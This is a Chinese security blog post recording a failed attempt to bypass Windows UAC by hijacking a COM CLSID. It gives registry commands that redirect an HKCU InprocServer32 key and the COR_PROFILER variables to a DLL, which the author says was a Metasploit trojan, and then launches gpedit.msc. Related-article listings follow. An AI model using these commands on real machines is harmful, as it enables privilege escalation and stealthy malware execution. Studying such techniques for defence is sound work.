(踩坑)劫持CLSID进行bypassuac

最新推荐文章于 2025-03-01 15:42:24 发布
最新推荐文章于 2025-03-01 15:42:24 发布
阅读量10w+ 收藏 2
点赞数 2
分类专栏: 内网渗透 提权 渗透测试基础知识 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41874930/article/details/109596917
版权

CATALOG

前言

我对clsid的理解就是一条命令或者一个程序或者一个文件,有些程序在启动的时候会查询注册表里面的某个clsid,并对其值进行操作,有可能是clsid中指定执行命令,有可能是加载clsid中指定的文件等等。官方的clsid的解释是:class identifier(类标识符)也称为CLASSID或CLSID,是与某一个类对象相联系的唯一标记(UUID)。

实现

1.条件

我们通过procmon这个软件找到合适被劫持的CLSID,适合被劫持的CLSID的条件:

  1. 以管理员权限启动的程序在启动的过程中被调用,例如gpedit.msc,compmgmt.msc,eventvwr.msc,secpol.msc,taskschd.msc等。
  2. 打开注册表键值HKCU:\Software\Classes\CLSID{****}\InprocServer32,返回NAME NOT FOUND
  3. 打开注册表键值HKCR:\CLSID{****}\InprocServer32,返回SUCCESS
    exp:
    在这里插入图片描述
    procmon下载地址
    windows工具套件

2.实现过程

这边我找到了两个可用的CLSID,打开procmon然后开启gpedit.msc,接着找到filter选项配置显示就好。
在这里插入图片描述
在这里插入图片描述
由于系统注册表中并没有我们需要的CLSID所以我们直接创建。命令如下,前面是添加注册表后面是删除注册表:

REG ADD "HKCU\Software\Classes\CLSID\{34AB8E82-C27E-11D1-A6C0-00C04FB94F17}\InprocServer32" /ve /t REG_EXPAND_SZ /d "%CD%\calc.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{34AB8E82-C27E-11D1-A6C0-00C04FB94F17}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
mmc gpedit.msc

SET KEY=HKEY_CURRENT_USER\Software\Classes\CLSID\{34AB8E82-C27E-11D1-A6C0-00C04FB94F17}
reg  delete %key% /f

最终可以查看到确实加载了calc.dll文件,但是并没有什么效果,我的dll文件是一个msf的木马文件,并没有弹回shell。
在这里插入图片描述

结论

无法实现bypassuac,也不知道哪里出了问题,继续学习。

参考文章

Use CLR to bypass UAC

[网络安全自学篇] 九十四.《Windows黑客编程技术详解》之提权技术(令牌权限提升和Bypass UAC)
杨秀璋的专栏
09-12 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充相关知识点。第六篇文章主要介绍木马病毒提权技术,包括进程访问令牌权限提升和Bypass UAC,希望对您有所帮助。
COM劫持 BypassUAC
weixin_45682070的博客
11-21 986
什么是com? com是Component Object Model(组件对象模型)的缩写 come是微软公司未来计算机工业的软件生产更符合人类的行为方式开发的一种新的软件开发技术。在com架构下,人们可以开发各种各样的功能专一的组件, 然后将他们安装需要组合起来,构成复杂的应用系统 这里不得不说一下CLSID CLSID(Class Identifier)全局唯一标识符,CLSID是指windows系统对于不同的应用程序,文件类型,OLE对象,特殊文件夹以及各种系组件分配的一个唯一表示他的ID代码, 用来
UUID、CLSID、IID的获取
小米的修行之路
05-05 8565
当初微软设计COM规范的时候,有两种选择来保证用户的设计的COM组件可以全球唯一: 第一种是采用和Internet地址一样的管理方式,成立一个管理机构,用户如果想开发一个COM组件的时候需要向该机构提出申请,并交一定的费用。 第二种是发明一种算法,每次都能产生一个全球唯一的COM组件标识符。 第一种方法,用户使用起来太不方便,微软采用第二种方法,并发明了一种算法,这种算法用 GUID
Windows提权之绕过uac bypassuac提权()
最新发布
2303_78851087的博客
03-01 564
Windows提权之绕过uac bypassuac提权()
Navicat12已过试用期(win10注册表解决办法)
weixin_40918145的博客
03-11 1万+
关闭Navicat Win + R,输入regedit回车 删除HKEY_CURRENT_USER\Software\PremiumSoft\Data——这里是删除data整个文件夹。 展开HKEY_CURRENT_USER\Software\Classes\CLSID——这里是展开CLSID。 展开每一个子文件夹,如果里面只包含一个名为Info的文件夹,就删掉它。——这里是删掉整个info...
Windows注册表的危险源安全配置总结
qiye622的博客
06-16 1075
** 映像劫持* 就是Image File Execution Options(其实应该称为“Image Hijack”。)是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。由于这个项主要是用来调试程序用的,对一般用户意义不大。默认是只有管理员和local system有权读写修改。 简单来说就是当目标被映像劫持时,当我们启动程序是劫持后的程序而不是原来的程序。操作也简单,在注册表的HKEY_LCOAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\
win11 取消(自动展开)右键的二级菜单
时生的博客
12-15 7133
主要介绍了如何通过修改注册表,展开win11系统下的右键菜单。涉及到的方法有:注册表编辑器、cmd命令行、powershell终端和软件四种
ByPass UAC
yeanhoo的博客
09-24 1298
ByPass UAC 白名单程序 Bypass UAC 有些系统程序是直接获取管理员权限,而不触发UAC弹框的,这类程序称为白名单程序.例如, slui.exe、wusa.exe、taskmgr.exe、msra.exe、eudcedit.exe、eventvwr.exe、CompMgmtLauncher.exe等.这些 白名单程序可以通过DLL劫持、注入或是修改注册表执行命令的方式启动目标程序,实现Bypass UAC提权操作 利用CompMgmtLauncher.exe、该程序在启动时会查询注册
提权技术之Bypass UAC
weixin_42071117的博客
10-19 976
// UAC(用户账户控制)是微软在Windows VISTA以后版本中引入的一种安全机制。通过UAC,应用程序和任务始终在非管理员权限下的安全上下文中运行。 // 除非特别授予管理员权限。UAC可以阻止未经授权的应用程序自动进行安装,并防止无意地更改系统设置。 // UAC需要授权的动作包括:配置Windows Update、增加或删除用户账户、更改用户账户的类型、改变UAC设置、安装ActiveX、安装或移除程序、安装设备驱动程序、 // 设置家长控制、将文件移动或复制到Program File或Wi
COM开发中的uuid,GUID,CLSID,ProgID区别在哪儿.zip
01-20
COM组件uuid,GUID,CLSID,ProgID区别在哪儿.zip
注册表删除方式解决Navicat到期问题
热门推荐
liuxuexiaoxiao的博客
06-22 1万+
1.关闭Navicat程序。 2.键盘按键win+R,输入regedit调出Windows系统注册表。 3.删除HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Data: 4.展开HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID,然后展开每一个子文件夹查看,如果里面只包含一个名为Info的文件夹,就删掉它: ...
Windows注册表的HKEY_CLASSES_ROOT是HKEY_LOCAL_MACHINE\SOFTWARE\Classes合并HKEY_CURRENT_USER\Software\Classes
kfepiza的博客
11-19 2918
定义:HKEY_CURRENT_USER(HKCU)包含了当前登录用户的配置信息的根目录。功能:存储当前用户的桌面设置、屏幕颜色、“控制面板”设置、用户文件夹路径等个性化配置。这些配置信息对于每个用户都是独立的,确保每个用户登录时都能看到自己的个性化设置。定义:HKEY_CLASSES_ROOT(HKCR)是系统中控制所有数据文件的项,包含了应用程序运行时必需的信息。功能:管理文件和应用程序之间的关联,包括文件扩展名、驱动程序名称、类的ID数字(CLSID)等。
如何去除win10文件资源管理器上的6个文件夹
I'm LINKSINKE
05-06 7019
首先说明一下,六个文件夹是那几个: 分别为Desktop(代表用户桌面)、视频、图片、文档、下载、音乐 解决方法,来自IT之家的设置: https://www.ithome.com/html/win10/317954.htm 主路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer...
Sql Server :Could not write value to key \Software\Classes\CLSID\...., Verify that you have....
ahutdbx的博客
07-21 4371
最近在用公司的电脑装数据库环境的时候遇到了一个问题,Could not write value to key \Software\Classes\CLSID\...., Verify that you have suffcient access ... 大致的意思就是没有权限写入注册表数据。 解决方案:在注册表中找到该文件位置,赋予当前用户完全控制权限(应当保证上级目录也具有此权限)...
我的电脑—管理—无法打开修改案例
weixin_66107852的博客
05-18 459
路径:HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-修改默认键值:mmc.exe%systemroot%\system32\compmgmt.msc/s。权限–高级–更改–添加administrators。点击当前目录command修改权限。若提示无法编辑,是因为权限问题。添加完全控制权限,再重新尝试。
为什么win32应用读取注册表HKEY_CLASSES_ROOT\CLSID\下面的值的数量要比x64的要少?
babytiger的专栏
03-08 620
然而,由于64位操作系统的存在,当32位的应用程序访问HKEY_CLASSES_ROOT时,它们实际上访问的是HKEY_LOCAL_MACHINE\SOFTWARE\Classes,而当64位的应用程序访问HKEY_CLASSES_ROOT时,它们实际上访问的是HKEY_LOCAL_MACHINE\SOFTWARE\Classes和HKEY_CURRENT_USER\Software\Classes的合并视图。下面的代码是32位的,读到的值要比64位的要少。
第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
qq_46081990的博客
06-22 488
【代码】第102天:权限提升-WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限。
BypassUAC-权限提升
weixin_45701675的博客
11-19 1344
什么是UAC?如何设置? UAC(UserAccount Control,用户账户控制) 简言之就是在Vista及更高版本中通过弹框进一步让用户 确认是否授权当前可执行文件来达到阻止恶意程序的目的。 可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级) 参考:http://cn-sec.com/archives/116488.html #BypassUAC提权?常见绕过项目? 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC 绕过项目:M
使用BypassUAC:轻松绕过Windows用户账户控制
gitblog_00086的博客
03-29 1030
使用BypassUAC:轻松绕过Windows用户账户控制 去发现同类优质开源项目:https://gitcode.com/ 是一个开源项目,旨在帮助开发者和安全研究人员在Windows操作系统中进行UAC(User Account Control)规避。该项目由Memoryo3o开发并维护,提供了一种技术手段,使得在不触发典型UAC警告的情况下执行高权限操作成为可能。 项目简介 在Windows...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shanfenglan7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值